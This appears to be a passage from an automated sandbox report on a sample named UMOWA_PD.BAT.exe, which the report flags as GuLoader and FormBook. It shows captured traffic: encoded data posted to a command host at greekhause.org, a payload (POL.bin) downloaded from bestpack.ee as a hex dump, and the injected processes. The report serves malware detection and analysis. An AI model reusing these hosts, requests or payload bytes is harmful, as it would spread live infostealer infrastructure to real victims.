                                                                                  93192.168.11.20498493.33.130.19080
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 10:00:40.131798983 CEST1289OUTPOST /phvf/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.greekhause.org
                                                                                  Origin: http://www.greekhause.org
                                                                                  Referer: http://www.greekhause.org/phvf/
                                                                                  Content-Length: 7370
                                                                                  Cache-Control: max-age=0
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Data Raw: 58 62 33 78 49 3d 5a 71 41 4b 68 6a 48 44 71 58 64 35 35 6a 2f 4c 68 77 52 45 2f 34 4a 50 30 2b 63 77 57 74 2b 65 47 50 34 5a 31 4a 39 51 46 35 64 4c 51 50 4e 52 63 6b 58 62 36 43 72 62 49 45 6a 71 6a 42 79 70 48 36 53 66 2f 70 4b 63 46 55 45 4a 52 31 51 43 64 66 58 75 6b 59 30 61 7a 49 53 50 64 52 76 6f 6b 7a 32 7a 78 4a 39 5a 79 4e 6b 79 31 69 4d 46 75 31 57 51 63 37 31 6f 63 33 66 74 6e 66 79 4e 4b 75 50 4b 37 6b 49 62 33 77 69 66 49 77 35 57 6b 69 4a 75 54 4b 58 64 49 65 38 71 63 68 77 47 79 34 41 64 45 50 77 58 54 43 71 54 63 33 37 6b 5a 46 4f 49 74 55 46 76 79 32 59 34 4d 7a 44 65 50 76 56 30 32 70 54 4c 6b 36 2f 43 59 36 2b 4d 37 42 53 44 46 43 70 61 4c 79 33 7a 4f 79 55 73 47 4f 4e 42 68 4c 62 6d 4c 33 31 4b 31 51 42 38 4f 72 6e 4c 53 42 2b 48 42 38 52 6e 46 46 61 61 73 54 72 66 50 38 66 32 4d 4c 4d 57 7a 45 79 4f 79 66 76 63 66 5a 2f 46 6a 59 4e 4e 67 66 72 6e 74 4f 5a 43 72 69 62 4d 42 62 71 31 50 4d 34 37 42 34 47 6d 65 51 70 30 5a 47 4c 33 6f 79 35 79 61 58 4e 31 6b 58 70 6b 45 41 31 4f [TRUNCATED]
                                                                                  Data Ascii: Xb3xI=ZqAKhjHDqXd55j/LhwRE/4JP0+cwWt+eGP4Z1J9QF5dLQPNRckXb6CrbIEjqjBypH6Sf/pKcFUEJR1QCdfXukY0azISPdRvokz2zxJ9ZyNky1iMFu1WQc71oc3ftnfyNKuPK7kIb3wifIw5WkiJuTKXdIe8qchwGy4AdEPwXTCqTc37kZFOItUFvy2Y4MzDePvV02pTLk6/CY6+M7BSDFCpaLy3zOyUsGONBhLbmL31K1QB8OrnLSB+HB8RnFFaasTrfP8f2MLMWzEyOyfvcfZ/FjYNNgfrntOZCribMBbq1PM47B4GmeQp0ZGL3oy5yaXN1kXpkEA1OOlmitVwWHvmaJAVRZvnSNOxBHDHsxnlEO257vRGubM7GjRZ42HwWn2pt64zlx64P5v7flDAk09YOWsXJwP6sdmsy31E3bm7e1R/n7GRHrPQr//xJf7d1zTmDxm5h/sPyXq5K0Omns47EixUnJKX3JAemqUfISWOGhXgJ5TtAqv8jbRyUKzHRhUdN8HRZT2Vc1u5ki//mtisMTv7fUU5ouwUOniIy9pxsksV2rQQ2UvsZDXErautIEMBPWtCO0UAzQJ5d/YmsqKBbo7T+hoU5J+5DHeIpEiVPLPFZvDL3w7Zazr+wpfTfTIXAoc9c+8syyfLkIXt6AU7yIwmd
                                                                                  Sep 25, 2024 10:00:40.131845951 CEST2578OUTData Raw: 70 74 32 68 79 65 79 65 6a 56 41 33 56 43 6b 7a 42 38 5a 50 4b 35 52 63 53 52 45 45 4f 76 58 2b 61 48 47 4c 76 30 58 65 71 6b 38 4e 33 72 42 41 31 49 59 57 79 38 62 72 71 34 59 61 76 73 6d 6f 63 37 41 2b 34 62 56 46 75 78 46 31 58 4b 46 4e 33 4d
                                                                                  Data Ascii: pt2hyeyejVA3VCkzB8ZPK5RcSREEOvX+aHGLv0Xeqk8N3rBA1IYWy8brq4Yavsmoc7A+4bVFuxF1XKFN3MJLxzvWEmdDXS45sMqgT/sAQYm4x/T5tsMHj29EAHfaz4zWhUWPduz9CoczxTnTKNAPwfYD9jeWfqrDxRt0iD//AfydCgrYmpcMCPUOyt1JhgHE1T66f2el5l22jc36Umcn7DYnq15Cmf4iw3Sfq0PWluZwpqTK6rq
                                                                                  Sep 25, 2024 10:00:40.131895065 CEST4118OUTData Raw: 63 4b 33 75 75 34 58 32 5a 30 5a 61 63 4b 31 69 48 66 58 73 4a 72 61 68 6c 39 6e 54 5a 56 4a 58 50 56 76 67 78 34 68 78 38 6d 76 71 58 37 69 31 43 52 70 4f 7a 65 2f 46 38 6e 36 58 67 2b 59 70 6f 59 68 58 54 76 6e 58 4f 6c 44 54 4e 58 54 38 38 79
                                                                                  Data Ascii: cK3uu4X2Z0ZacK1iHfXsJrahl9nTZVJXPVvgx4hx8mvqX7i1CRpOze/F8n6Xg+YpoYhXTvnXOlDTNXT88y1fS3IHSuMvXuyya9Q1Y+RAIv9Fmy9kIgowMcCKRQ/zI40xgQP8sCy1GKRbUM4+2bTeuYqNfFx2OX5kWCuSgiWeYvzntaxlDKYoZLA1epzvw3X4okax953VdeAYb0F4wkbbZJjNBJsmsxr/2062+u73GWwePAFJ/w/


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  94192.168.11.20498503.33.130.19080
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Sep 25, 2024 10:00:42.767828941 CEST548OUTGET /phvf/?O4bP=9dRH6ZfHbJX&Xb3xI=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0= HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Host: www.greekhause.org
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; BLASTER Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36
                                                                                  Sep 25, 2024 10:00:42.872776985 CEST398INHTTP/1.1 200 OK
                                                                                  Server: openresty
                                                                                  Date: Wed, 25 Sep 2024 08:00:42 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 258
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 4f 34 62 50 3d 39 64 52 48 36 5a 66 48 62 4a 58 26 58 62 33 78 49 3d 55 6f 6f 71 69 55 2b 75 69 58 52 70 68 6c 65 78 78 69 68 59 38 2b 70 52 32 70 31 71 53 61 43 47 52 73 4d 69 67 74 34 4d 47 70 41 2f 56 4b 56 79 58 6b 4c 38 71 79 65 69 66 56 57 49 31 51 66 39 49 62 4b 6a 6a 61 54 2b 4e 42 34 30 45 48 49 31 63 73 4f 77 38 62 45 48 38 72 76 35 58 67 50 70 73 48 69 6c 32 4a 34 77 35 4d 4a 4f 77 67 70 41 74 31 62 43 52 76 30 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?O4bP=9dRH6ZfHbJX&Xb3xI=UooqiU+uiXRphlexxihY8+pR2p1qSaCGRsMigt4MGpA/VKVyXkL8qyeifVWI1Qf9IbKjjaT+NB40EHI1csOw8bEH8rv5XgPpsHil2J4w5MJOwgpAt1bCRv0="}</script></head></html>


                                                                                  HTTPS Proxied Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  0192.168.11.2049756185.86.211.1374432788C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-09-25 07:54:24 UTC187OUTGET /POL.bin HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: bestpack.ee
                                                                                  Connection: Keep-Alive
                                                                                  2024-09-25 07:54:25 UTC283INHTTP/1.1 200 OK
                                                                                  Date: Wed, 25 Sep 2024 07:54:24 GMT
                                                                                  Server: Apache
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade, close
                                                                                  Last-Modified: Wed, 25 Sep 2024 06:31:10 GMT
                                                                                  Accept-Ranges: bytes
                                                                                  Content-Length: 288320
                                                                                  Vary: Accept-Encoding,User-Agent
                                                                                  Content-Type: application/octet-stream
                                                                                  2024-09-25 07:54:25 UTC7909INData Raw: dc 73 d1 3b 1b 5e ea e6 ea 93 b4 79 2a 5d 4c a3 3b 5c be 29 fa 30 54 50 3a 91 3d 64 25 a7 28 6d 08 c2 22 7e 75 d7 90 f5 2f 62 1e 11 4f 91 3c 0f 88 1d cb 71 d1 8f 33 95 6e be 21 23 2a 8c b8 6d 08 53 eb 65 6f 20 c9 7c 13 8f 4b 0e c3 15 d1 39 2d e9 88 a1 16 7e 61 65 c0 b9 66 e1 dd 17 80 d2 58 87 a0 62 47 26 59 42 0e 47 d7 51 6b b7 c9 e6 9d 36 c5 92 99 2c 9a 25 03 fb 6c c9 c6 4f 0a c0 13 6a bf 5c fa 53 57 51 c8 5c 0e d4 21 b6 d3 a5 b3 00 96 d8 12 ad 23 c9 4d ee ff 24 65 b3 13 6e e4 10 7a c4 c9 35 eb 78 35 fa 07 e5 30 0f 04 8b 5e 6c fe 2a 9f fd f5 f7 92 29 b1 2f 99 d4 6d d6 29 db e4 54 73 ea 28 32 8e 82 35 ce 95 13 4d 1c b9 4c 53 cc e4 3f a6 3e 06 51 fb 81 b1 f7 f3 84 de 07 b1 aa af 29 b1 11 6a ee e3 54 cd 7a 14 85 d8 d8 16 85 b2 f5 97 46 23 69 b2 fb 25 29 a3
                                                                                  Data Ascii: s;^y*]L;\)0TP:=d%(m"~u/bO<q3n!#*mSeo |K9-~aefXbG&YBGQk6,%lOj\SWQ\!#M$enz5x50^l*)/m)Ts(25MLS?>Q)jTzF#i%)
                                                                                  2024-09-25 07:54:25 UTC8000INData Raw: b6 1e ea a3 f3 98 ef 89 14 ba d6 0e 20 dc 30 0d c8 37 1a c8 e9 ed 9c e6 02 57 e3 21 77 74 2b a9 16 cd 48 18 57 86 f8 9a 4c 5b a5 82 bf ff 0e a5 7f c6 24 1f 6d 3b a4 d2 a2 6c ba f2 a1 6b e0 2c f1 b2 30 c2 08 85 76 19 7a 0f 1d 21 24 0f 2e de 12 68 73 68 3f af 05 cc db de 7b ea 79 e3 e9 12 8a db f8 5f 0c 57 0b f4 59 d5 e3 eb eb 9d 82 07 4e 5b ef 84 92 a9 a5 f6 3d e3 11 9c b3 cd 46 01 80 c0 a7 b6 6c 45 3a ee 91 90 d3 a3 76 57 cf 03 34 63 bc ef a3 8f eb ed 03 44 f2 fe 0f b1 92 f6 23 17 7b c8 e6 cf 47 6f 99 37 cf a0 8b 60 82 09 4c bb ba fb b0 be 78 22 f8 73 a6 a4 19 cd d3 79 46 72 cc 12 be 72 71 e9 41 23 99 3d 78 06 17 f6 e2 1f 60 8d d6 c4 39 0c 2d f9 6f e8 3a 9d 0f 5d 57 14 68 34 49 4c 20 cb 83 ad 5b a0 72 5f 44 e2 b0 08 de 5c 7c cf cc d9 e7 5c fa 31 fa 2f 32
                                                                                  Data Ascii: 07W!wt+HWL[$m;lk,0vz!$.hsh?{y_WYN[=FlE:vW4cD#{Go7`Lx"syFrrqA#=x`9-o:]Wh4IL [r_D\|\1/2
                                                                                  2024-09-25 07:54:25 UTC8000INData Raw: 1e 5d 0b da d5 fd 82 3d 53 bb 6f c6 94 4f 01 60 4c 60 16 64 88 a9 f8 99 ac 40 e8 fa 0e b1 f7 ab 86 9c ea 3b bd 9a a4 a4 d2 5b 31 34 eb 87 6b c1 89 2a 94 97 24 59 98 76 86 ea 70 ed 96 36 3e 04 3d 3f 2f 96 53 df 3b 31 fa 60 87 c9 17 70 3c 32 ea 7a 02 6e 98 f4 c2 e4 e5 f2 8c 80 54 d1 8c e6 d1 28 e4 a3 6a f2 8d 41 d5 fd 5e 92 e5 b4 3f f9 1f b5 28 9b f2 a5 c2 47 95 36 69 04 bf 23 64 4e 38 d8 3f 73 15 53 f5 89 91 96 c4 9e a6 88 80 8b a1 fa 3a 4c 0e 24 d9 02 45 f9 02 af be af d4 9c cb 83 9c 6f 06 47 04 e3 68 0c 88 0a b1 2c c7 f1 b1 53 e7 4e 8f 99 dc a7 12 b4 27 49 fa ef 99 15 d1 1f eb 8f 92 c8 c4 78 ef 6a b1 e1 31 3c 61 77 b9 53 47 c0 bc 5d 21 22 27 60 6e 09 c8 45 66 19 2e a8 7f 6a 9b ac 31 9e 62 92 aa 94 2d 5b da dc 27 1e 72 b4 dd f1 a1 6f 13 97 e2 32 94 44 da
                                                                                  Data Ascii: ]=SoO`L`d@;[14k*$Yvp6>=?/S;1`p<2znT(jA^?(G6i#dN8?sS:L$EoGh,SN'Ixj1<awSG]!"'`nEf.j1b-['ro2D
                                                                                  2024-09-25 07:54:25 UTC8000INData Raw: 77 ea b8 d3 7f 94 20 26 92 76 8b ad 32 57 e7 c6 1f f0 e5 cc c9 c7 9c 56 0a 4a 30 7e 4e 6a 55 df 11 32 44 de e0 28 dc f5 04 0b 83 7f a1 5d 1e 0e 7a df a0 e1 5b 90 a7 41 3d 1c 64 a9 70 66 b2 75 39 a7 7b 34 c9 53 e7 7a 8f 27 e6 02 c0 af c0 08 ea e6 8d c9 1d e0 35 44 3c 40 eb 55 25 39 8f c1 af 30 6b b3 ac 02 ff d8 f0 0b 5a 71 7b 61 53 ab 85 3c 82 be 38 47 91 b3 7d ef 0b a4 4a 9f e4 f9 f1 ce 4d 51 a8 86 7a 04 3a d2 ff d5 70 5b 07 0b 89 d0 d0 74 b3 df a4 e0 34 37 c4 f9 30 de ad 4d 30 30 4f 09 89 71 5a 85 ac 35 4e 11 71 83 eb 05 ab 31 73 fe cf eb 8c 59 f2 34 be 1a f4 ee 35 8a 84 47 28 4c 2c 4a 54 db 41 fb 50 17 2b c0 e7 17 78 31 5b 73 9f a1 74 39 c1 d8 7b 02 64 8e 5a 94 71 ad df ee 3d 20 4a 04 4a ca 7a d4 60 5b 9c e5 26 75 28 d5 ba d1 be b6 d4 cf 40 b9 59 34 1f
                                                                                  Data Ascii: w &v2WVJ0~NjU2D(]z[A=dpfu9{4Sz'5D<@U%90kZq{aS<8G}JMQz:p[t470M00OqZ5Nq1sY45G(L,JTAP+x1[st9{dZq= JJz`[&u(@Y4
                                                                                  2024-09-25 07:54:25 UTC8000INData Raw: 26 92 40 a9 a7 25 3c 86 a0 93 8c 3a c9 5d 26 7a a3 b5 be c9 1e c1 3e b3 ef bf a6 3e fb 85 99 85 af 2b 46 0d e2 b8 c5 06 b0 a7 ce ab bc 4d 71 47 61 52 2f ff 02 dc 8b 65 63 07 f9 3a b0 8a 16 ed f1 e1 67 ed 42 32 ab 43 bf c8 89 f8 e8 71 ad b4 df 90 04 4a dd 30 ed d2 21 78 bf de 4f b6 1c 50 23 b3 9b 27 8e ae 40 c7 c9 09 c1 50 10 fd 75 ea 59 87 40 0b a4 18 d2 40 8c f5 47 5e a4 bb ef a3 a6 76 39 0f 04 eb a8 c6 08 21 82 fe 73 48 dd 80 99 f5 8c e8 c3 1c 81 6e 1e b3 04 eb 93 89 74 ec fd b1 92 00 8e 6d 9f b5 bb 87 77 17 54 6f 9d 4a 6c 1f 3a 33 cc 43 49 f2 c9 82 2a 0d ad ae 30 0a ab c1 b8 ae 6a 20 28 12 ad e5 2e 33 19 db 8d 02 82 63 d9 29 8d 84 6d 61 d6 66 49 fc e7 ac 6e 5d 5a f0 b0 c8 01 f7 1c cc 29 96 3a 35 bb 22 12 c0 90 55 16 92 b5 e2 e8 0d 55 ed 9e 78 20 4e 73
                                                                                  Data Ascii: &@%<:]&z>>+FMqGaR/ec:gB2CqJ0!xOP#'@PuY@@G^v9!sHntmwToJl:3CI*0j (.3c)mafIn]Z):5"UUx Ns
                                                                                  2024-09-25 07:54:25 UTC8000INData Raw: 41 ab 3b 1c b0 e1 2d 48 2c 3e 45 48 87 93 59 3a 9b fe 0e 94 ee 04 39 cb 70 08 fe 56 64 c7 dd 29 5f 45 a3 60 bd 81 be e8 eb 84 ab 65 a5 34 73 ca 78 0b ab cd 2b cf c0 79 ae 8e 5f f2 6b a2 ea e4 5d 7e 97 13 2a 65 b1 6a 5b a0 50 68 22 40 47 96 28 3d c3 26 9c 04 f1 ea fd f9 ab 1c fa 7a 54 be e7 10 f3 67 c5 27 60 a3 fd 4b 41 6b 5d 5f 20 89 48 8a 48 02 96 95 46 cc fd 63 9e b7 6a b1 6c a7 11 88 b3 45 2e 22 d8 fa 85 eb ad 88 43 a8 62 7f f3 dc fb e9 5f 6f 97 86 0d 5b d3 f4 e0 11 2b 9c 47 a4 bd 19 02 43 b7 c8 3b b5 03 6f c0 d7 79 1e 8b 17 27 c3 b7 96 0a 2d 06 da 9d 58 8d 9b 1d 6c 3b ce 4f 88 4c 98 d6 7a aa 56 ec ef fb 27 03 87 2d 11 d5 e7 7c 12 e4 f8 17 45 43 ad cc 5f 94 45 da c2 51 d3 13 f0 3e 71 b3 f2 2a d8 49 33 57 fb 65 80 37 8b 48 9a 66 07 df 87 05 a3 08 dc e2
                                                                                  Data Ascii: A;-H,>EHY:9pVd)_E`e4sx+y_k]~*ej[Ph"@G(=&zTg'`KAk]_ HHFcjlE."Cb_o[+GC;oy'-Xl;OLzV'-|EC_EQ>q*I3We7Hf
                                                                                  2024-09-25 07:54:25 UTC8000INData Raw: 7a 06 b7 e1 ab 69 41 92 41 e2 7a 71 fd 31 7e b9 04 89 92 36 a9 aa 0f af e3 10 5d 82 71 98 11 39 3f 43 fe 3a da 83 25 31 4b 76 75 f7 63 be 2f 99 1c fe c4 a0 be 39 a5 7d bf 2f f5 40 61 99 52 9f 4d f8 e9 cc 1f 92 de 7f 8d 05 d4 03 22 8c c9 79 11 83 f1 0a a5 e8 00 94 6c 24 f6 09 2d 55 6a 16 5c d2 a8 d7 6d f0 56 81 8d 5f 18 62 3e 26 d4 20 b1 48 5f ad 80 e7 ca 93 c5 51 0f 5a b4 f2 c9 b5 73 ed f8 0a ec dc 78 4b c5 24 16 d9 a5 90 97 cc cf 10 21 66 61 8a bd a0 1a c1 cf 28 bc 02 29 1f 92 c7 51 a7 f7 ac e9 92 99 d9 eb 27 5e 42 dc b2 5d 43 fc 2f c9 82 57 ec cc d7 c0 b2 7a fc 67 fd d2 37 f5 f3 03 5d 76 d2 67 8b 22 e5 04 c1 37 25 f6 37 d2 7e 69 15 8d bf 3d 78 45 75 64 b3 d7 2e 83 5e 9c 40 57 b6 aa eb 32 34 81 05 a2 a2 9f aa fd 65 2f ca fa d0 c9 23 9d 35 9e 3a a6 a5 e1
                                                                                  Data Ascii: ziAAzq1~6]q9?C:%1Kvuc/9}/@aRM"yl$-Uj\mV_b>& H_QZsxK$!fa()Q'^B]C/Wzg7]vg"7%7~i=xEud.^@W24e/#5:
                                                                                  2024-09-25 07:54:25 UTC8000INData Raw: fc e8 8e 03 34 0a 2b 0c 00 df a1 8e f2 88 90 ac 27 49 aa 19 a5 3b 96 67 06 07 38 4c 38 21 50 1f ca 45 8b 5d a5 4f 6c 01 86 3b 01 db 0b 3c ab 84 f3 1c 79 2d 96 15 b0 8a 81 ae f9 af ff 76 53 71 26 4b 23 bd 97 f6 06 c1 8c ab c4 be eb 07 c2 1b ec 13 9c 6f 08 44 d8 1c 2c 2a 20 90 b9 13 20 e5 29 a3 a3 ec 5c 43 3f de e3 bf 87 ac 41 59 4c 2a 44 28 4e 78 d9 28 97 cf 9e 1d 7c 3a 4e 2f 65 52 5f ce ab 80 18 e5 33 c7 09 58 ed af 9e fe 0b b5 1c c1 e7 03 3c 8c 9a 60 c3 9c c9 5a bf d6 10 a8 2f 76 72 03 ee 91 81 80 9f 0c cd 68 eb 50 5a 0a af 09 f8 66 65 95 a8 09 b5 15 b6 ad ff 1b 75 ba be 05 da 70 d0 1c 0e 39 e4 f7 3c 2a 83 27 ac 06 9f 2f 8a d7 38 34 ef e8 e3 58 fe 27 df 76 b1 eb d3 22 e2 c4 85 3a 0f af b4 f7 80 e9 4a 7d 33 52 4d 99 b9 4a 2e 04 d7 28 0c b8 8d e8 f4 0a d6
                                                                                  Data Ascii: 4+'I;g8L8!PE]Ol;<y-vSq&K#oD,* )\C?AYL*D(Nx(|:N/eR_3X<`Z/vrhPZfeup9<*'/84X'v":J}3RMJ.(
                                                                                  2024-09-25 07:54:25 UTC8000INData Raw: fe b4 80 81 cc da ca 53 18 d5 cc 8d 87 d1 9a c8 61 a2 d7 f3 1f f8 22 06 c6 e6 13 c2 81 c3 a7 e4 4e 2a 94 83 bb d5 98 be 1d c1 59 0c 60 c9 ca a0 42 cc 85 cf 3a 6d 84 cc bb 07 72 f6 2a 66 79 81 a6 7c d6 a5 9b 42 23 0d 59 6f 50 36 57 12 ea 92 b8 b3 d7 2f 18 33 a4 33 c9 0b 3f 91 8e 07 21 db bc 47 b0 68 57 91 ad 30 f2 77 6e 94 01 17 45 6e 55 1f 7b cc 35 c7 41 de 41 00 20 7a 83 88 18 0e 1c 80 df d5 48 6d f1 53 26 d6 6c 27 f6 f0 52 94 1e 61 1d de c6 b6 6e ab e9 d3 e3 ed e2 87 0a a0 60 46 5a 09 7a ab 80 22 5b 2c 66 39 f2 fc ba db 2b cc 69 87 72 ad d9 9e 15 e3 a2 82 9c 3a 82 05 5b a7 7a 33 f1 7e b7 69 0e d9 c2 c9 9d 01 66 60 af 74 86 cc b3 89 8e 06 7c 36 f9 f4 0a a9 0f e3 fd ba 53 eb 69 ed ec 0f a4 48 15 ad 2a 30 bb f8 e2 59 56 05 40 5b b1 41 8a 96 af 82 a1 66 60
                                                                                  Data Ascii: Sa"N*Y`B:mr*fy|B#YoP6W/33?!GhW0wnEnU{5AA zHmS&l'Ran`FZz"[,f9+ir:[z3~if`t|6SiH*0YV@[Af`
                                                                                  2024-09-25 07:54:25 UTC8000INData Raw: 97 93 b2 3d 8c f9 9a 82 5f 75 38 85 aa 24 34 d1 2f 5f e6 0f bf 0f 5b 7b 87 1f 67 17 05 df aa 61 25 8b 3f 37 7b e9 d2 47 ae ec d1 a5 61 65 11 ce b4 d1 a0 76 83 0c a8 d8 70 20 74 1e c2 7e cc 90 0a 4b 66 f2 5c f9 ec 6b 12 2b 7c ce b8 85 99 fe c3 12 c9 49 c2 51 7f 06 79 05 70 a6 57 4d c2 35 b7 af 5b 29 14 e6 e4 bb b8 d6 a0 79 59 4a d6 97 32 93 76 6d a1 f6 54 24 8a 0c 12 fc 39 5c a0 f1 ec b3 77 41 0c 1f 48 40 83 79 0e b7 28 cb 17 c8 6e 7a 72 6d da 79 8c 7e e0 1f 7a fe a2 73 8d 7c bf cd 75 98 c8 72 14 6f c5 49 89 09 42 c3 29 8a ef 5d 02 68 42 6a 31 c7 29 47 08 d3 45 d1 b7 da 60 90 1d 6e 21 43 00 ae 55 fe 45 36 a8 2d df 62 59 27 af c6 49 b5 f8 bd 72 af 67 7c b6 7c 30 bd 2d 2b 3f be 6c b5 09 00 4a fb fc 9b ce 43 cf 39 31 6e e4 2f db b2 63 db 68 e6 37 7e 77 8f f7
                                                                                  Data Ascii: =_u8$4/_[{ga%?7{Gaevp t~Kf\k+|IQypWM5[)yYJ2vmT$9\wAH@y(nzrmy~zs|uroIB)]hBj1)GE`n!CUE6-bY'Irg||0-+?lJC91n/ch7~w


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:03:53:56
                                                                                  Start date:25/09/2024
                                                                                  Path:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\UMOWA_PD.BAT.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:566'445 bytes
                                                                                  MD5 hash:D1F841D041C915F803DBE6C15B19C510
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.15206197185.0000000005014000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:03:54:15
                                                                                  Start date:25/09/2024
                                                                                  Path:C:\Users\user\Desktop\UMOWA_PD.BAT.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\UMOWA_PD.BAT.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:566'445 bytes
                                                                                  MD5 hash:D1F841D041C915F803DBE6C15B19C510
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.15388452470.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.15388452470.00000000000B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.15388629452.00000000017D4000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.15405766333.0000000035DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.15405766333.0000000035DB0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:03:54:36
                                                                                  Start date:25/09/2024
                                                                                  Path:C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\dhRiHTExjJnJkSBdQurHdqlFzJxpfDDcASxxhCLbjCbKzyvQYVLHt\giLTwJlyLWpfb.exe"
                                                                                  Imagebase:0x90000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.19982524217.0000000004990000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.19982524217.0000000004990000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:4
                                                                                  Start time:03:54:37
                                                                                  Start date:25/09/2024
                                                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\ipconfig.exe"
                                                                                  Imagebase:0x1e0000
                                                                                  File size:29'184 bytes
                                                                                  MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.19061585968.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.19061692398.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.19061692398.0000000002FE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  General

